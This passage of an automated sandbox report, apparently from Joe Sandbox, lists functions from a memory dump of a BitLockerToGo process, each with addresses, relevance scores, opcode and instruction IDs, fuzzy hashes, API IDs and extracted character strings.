                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1887581fc878ed3afa59a167ea5b6b3d117fc3f68692e9b14913b38564361c2d
                                                                                                                                                                                                                                                  • Instruction ID: 14eafbd078324d38f101dc6693376f08451a84af5012dec79c4cc784ac62b484
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1887581fc878ed3afa59a167ea5b6b3d117fc3f68692e9b14913b38564361c2d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 284104F96082059FD7109F29D88092BB3E4ABC1314F09453EEA89A73C1E739EC01879A
                                                                                                                                                                                                                                                  Function 0043F920 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4990817c76d57d89f28198e73e49e860bcfd96cce67703bb246c7650df34bc5a
                                                                                                                                                                                                                                                  • Instruction ID: f4f0363dd95e50741f72455d79abbfccff5b0612f73ca7850b455d00188d0aff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4990817c76d57d89f28198e73e49e860bcfd96cce67703bb246c7650df34bc5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5221F572D082145BC3249B59C48172BF7E4EF9E705F16962FE9C4973A4E3389C1887E5
                                                                                                                                                                                                                                                  Function 004340F2 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: dfa7f450ce01ecc99c11cd11a422bdf78ddd83e20e74342183b544cb920103f9
                                                                                                                                                                                                                                                  • Instruction ID: fb49a6300579c27871cff489de48b32c210ccae1b11645f7553ec1593db696f3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfa7f450ce01ecc99c11cd11a422bdf78ddd83e20e74342183b544cb920103f9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22318B30004F818AD7218F2688547A3BFE0AF2F256F18299ED4DA97693D729F485CF18
                                                                                                                                                                                                                                                  Function 00404A60 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fa1cf012e01dd0a33468a09c896f51d223e52fe984981e4db0337d423be14dcc
                                                                                                                                                                                                                                                  • Instruction ID: c8f405c7c9c1f97d1b8d27957bb82e61f492cdff829c4066b429f3a5a19fa389
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa1cf012e01dd0a33468a09c896f51d223e52fe984981e4db0337d423be14dcc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1531B7707582009BD7109E19D880527B7E1EFC4358F18893EE99AAB381D339DD52CF8E
                                                                                                                                                                                                                                                  Function 00408D90 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: faecb988bc91d4339e7aa4cb013b34e1e6f822bd332215a121d1621023b47ed0
                                                                                                                                                                                                                                                  • Instruction ID: 7ae0fa0ed233828fcb9b6b6df7fc76e41a8c845a5a48b1b6e188d5238e2dc77c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: faecb988bc91d4339e7aa4cb013b34e1e6f822bd332215a121d1621023b47ed0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8021E7717003154FCB08CE69CA91A2BB7D6FB84718F04413EEA46E77C1DA79E8158BD8
                                                                                                                                                                                                                                                  Function 00416016 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3899ce1b949b2dfc3cb1caf589be8c6c5fbc4f1a3d20b289a5f44dae537ff27e
                                                                                                                                                                                                                                                  • Instruction ID: 4d040b723c042a8bdad6fa7d86aedd97926d89415a19cc4ab7b7c0059103c4ee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3899ce1b949b2dfc3cb1caf589be8c6c5fbc4f1a3d20b289a5f44dae537ff27e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D310EB0908B058BD32CCF29D8A17A2B7E1FB89308F04882ED2EF97741CB706554CB58
                                                                                                                                                                                                                                                  Function 0043BB50 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction ID: 2d20becdcac22a936684325d3bb42f08e8b23f6142ca72106b4160fbd8ce1334
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3115933A041D40EC3128D3C8400665FFA34AE7234F58439AF4B49B2D6CB2A9D8A8398
                                                                                                                                                                                                                                                  Function 0043820F Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6fec54a99f9fbac47ce9e4549ff29fa63aa55858868289cb6989d8ecc1896df1
                                                                                                                                                                                                                                                  • Instruction ID: 93977dfb57e4194a6656e5daef84cb97a035edd253edcf9bc1b60b2c8519fbf9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6fec54a99f9fbac47ce9e4549ff29fa63aa55858868289cb6989d8ecc1896df1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1121B4F0904B00AFD364EF3AC946757BEE8FB49350F508A1EF4AA87690D371A5448BD6
                                                                                                                                                                                                                                                  Function 0042FAC0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cd5b8c032f38892569d862603859582475589757443902fd26e89881274df44e
                                                                                                                                                                                                                                                  • Instruction ID: bb6a9f11dec9aaabc402874fd6fe767739662e7c3dc4b3ebc9a4df7e229ca194
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd5b8c032f38892569d862603859582475589757443902fd26e89881274df44e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E0192B170031197DA20DF55E4D1B37B6B86F90708F98413ED80A97342DBB9EC09C6A9
                                                                                                                                                                                                                                                  Function 0041AA70 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bcb308c04c1f3215ed22ce86bfc9f8a4beb430ab0e49f7044f6ca3dc80d82e34
                                                                                                                                                                                                                                                  • Instruction ID: e6df7435b35dc03ef046c6d937846b96e26642c71c60abef5850cb5f7e7a4fe8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcb308c04c1f3215ed22ce86bfc9f8a4beb430ab0e49f7044f6ca3dc80d82e34
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08F0A7B1A0415057DB22C9559C81BB7BB9CCF8B3A4F190417E84557202E1795CD8C3EE
                                                                                                                                                                                                                                                  Function 004423D0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                                                                                  • Instruction ID: 70fd4d8660649c4cc1aee28f4a9409345eae8d093d65b6a5c03d063ad3adfc1f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBD05B2150822146BB648E29A500577F7F0EA87711B85555FFA86E3244D234DC41D16D
                                                                                                                                                                                                                                                  Function 00427E73 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9385e8aa8fd41dfacdd9aae494201ea6d279f7af78fecc39e2f0176506ad951f
                                                                                                                                                                                                                                                  • Instruction ID: 86644001eb4e0fafcc888b4b38741f7d4c4b97b8ecc491a716586d559c45a34b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9385e8aa8fd41dfacdd9aae494201ea6d279f7af78fecc39e2f0176506ad951f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10B092A5D00004C6D811BB113D8253BB0341553749F04223AE80772243B6AAD11A68BF
                                                                                                                                                                                                                                                  Function 004364D1 Relevance: 103.4, APIs: 1, Strings: 58, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                                                                  • String ID: &$*$0$1$3$9$9$9$;$=$?$?$A$B$C$C$E$G$I$I$K$M$M$O$O$Q$S$U$W$Y$[$]$_$`$a$a$c$c$d$e$f$g$h$i$j$k$l$m$n$o$q$s$s$u$w${$}$~
                                                                                                                                                                                                                                                  • API String ID: 2525500382-3639167494
                                                                                                                                                                                                                                                  • Opcode ID: 76f1d5796f7695d41eae7858e4afae9bd234d909f57e30a470494b9d60acaab0
                                                                                                                                                                                                                                                  • Instruction ID: 557e1f16afa68a177549afedec941ca11d80cd5315d4e5abcf580aaeae9fac20
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76f1d5796f7695d41eae7858e4afae9bd234d909f57e30a470494b9d60acaab0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05A16A7050D7C0CAE3329B2894987DBBFD16BA6308F08499DC4CC4B392C7BA5559CB67
                                                                                                                                                                                                                                                  Function 00437E71 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 119memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                                                                  • String ID: !$$$%$&$)$.$/$/$0$P$T$X$i$k$m$o$q$s$u$w$y${$}
                                                                                                                                                                                                                                                  • API String ID: 2525500382-880222569
                                                                                                                                                                                                                                                  • Opcode ID: 8e827eb8f60d25ad32fd2294c632f16c6ced63ea5b732db148c5800e50b8eae6
                                                                                                                                                                                                                                                  • Instruction ID: e69c79acf4ee86e3e4def9c59e11c833ffcafcb35cf2263b69eeac9fe83a893f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e827eb8f60d25ad32fd2294c632f16c6ced63ea5b732db148c5800e50b8eae6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7961B25000CBC28DDB268F3C98C86527F911B27224F1987C9E8E54E6EBC365D55AC766
                                                                                                                                                                                                                                                  Function 00437291 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 114memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                                                                  • String ID: !$$$%$&$)$.$/$/$0$P$T$X$i$k$m$o$q$s$u$w$y${$}
                                                                                                                                                                                                                                                  • API String ID: 2525500382-880222569
                                                                                                                                                                                                                                                  • Opcode ID: 7a41fd013abbc6985b5fe7be006ee9c85dcc45faac53bde7fce15f8cafc15b97
                                                                                                                                                                                                                                                  • Instruction ID: e0ae1a84b284383686c5989c35dd07655b1a9cc9c76ba1be7519b2d94daada68
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a41fd013abbc6985b5fe7be006ee9c85dcc45faac53bde7fce15f8cafc15b97
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D61B15040CBC2CDDB228F3C98C86527E911B27224F1987C9E8F94F6EBC365D55AC7A6
                                                                                                                                                                                                                                                  Function 00434FF1 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 89COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                  • String ID: !$$$&$,$1$1$3$3$3$5$7$9$9$<$@
                                                                                                                                                                                                                                                  • API String ID: 2610073882-1861331566
                                                                                                                                                                                                                                                  • Opcode ID: 9da4b6c6a95794bd569b55d657ee5ae842b0450e9b9cbf85ba651c73724a44e6
                                                                                                                                                                                                                                                  • Instruction ID: a95d36a404f40a34425e6b021172d7a295853d9be989e13a5647eb792d0ef30c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9da4b6c6a95794bd569b55d657ee5ae842b0450e9b9cbf85ba651c73724a44e6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5851F42010C7C2CAD332DB68D44879FBFE0ABA6224F044E9EE4E95B392D3754109CB63
                                                                                                                                                                                                                                                  Function 00434E43 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 79COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                  • String ID: !$#$%$'$1$3$5$6$7$9$;$=$?$y$z
                                                                                                                                                                                                                                                  • API String ID: 2610073882-4166476733
                                                                                                                                                                                                                                                  • Opcode ID: bba36788ebcb8f8432dfbde3b9f13095bfc6edcf8fdb6178925446eaf7969dce
                                                                                                                                                                                                                                                  • Instruction ID: 6d827c28aec3b1fd745f4a363255be3b539ccdfe476402e7c3b2867818ec946f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bba36788ebcb8f8432dfbde3b9f13095bfc6edcf8fdb6178925446eaf7969dce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1941F27000C3C08ED322DB68854878EFFE0ABA6318F084D5DE5E487382C7BA9549CB67
                                                                                                                                                                                                                                                  Function 004360F1 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 84COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                  • String ID: `$b$k$o$w$y$}$~
                                                                                                                                                                                                                                                  • API String ID: 2610073882-2332359574
                                                                                                                                                                                                                                                  • Opcode ID: 3a139857890e72adbbefdfb60c7d8be4b062a2b0f472f99815651bfc2c596171
                                                                                                                                                                                                                                                  • Instruction ID: 5233d0ba22510e7c9e208c340d624129d3d1ecc693347c7f5e0dd6301a21b8cb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a139857890e72adbbefdfb60c7d8be4b062a2b0f472f99815651bfc2c596171
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E51E37010C7C5CED3369B2884497DFBFE0ABA6314F058A9DD4E88B292D7B54189CB63
                                                                                                                                                                                                                                                  Function 00435B63 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 33COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                                                                                                                  • String ID: A$C$E$G$I$K
                                                                                                                                                                                                                                                  • API String ID: 1927566239-2163534136
                                                                                                                                                                                                                                                  • Opcode ID: 6ac90cfe0c71195ab9dda6ab112e90811c46258b06703a7904ba39b1f0921203
                                                                                                                                                                                                                                                  • Instruction ID: 3fd3e71f42c30ea62048a0e6d1b64db727e7ff65880470ea2c1ad557e841c4bb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ac90cfe0c71195ab9dda6ab112e90811c46258b06703a7904ba39b1f0921203
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1119C6040CBC18AD332863C845878FFFD06BA3224F184A5CE5F8873E2D67595459B67
                                                                                                                                                                                                                                                  Function 00435DF8 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 32COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                                                                                                                  • String ID: A$C$E$G$I$K
                                                                                                                                                                                                                                                  • API String ID: 1927566239-2163534136
                                                                                                                                                                                                                                                  • Opcode ID: 9558e9404b7784dd0518422afb51845ca099869b0e7ccd5a734b0d3babbf4b61
                                                                                                                                                                                                                                                  • Instruction ID: 94652b419ae41e799c2c3ea28efc5ce03170979acaa706f6012e8417a916153b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9558e9404b7784dd0518422afb51845ca099869b0e7ccd5a734b0d3babbf4b61
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2119B6040CBC189D332863C445879FFFD06BA3224F184B9DE6F88A3E2D6758546D767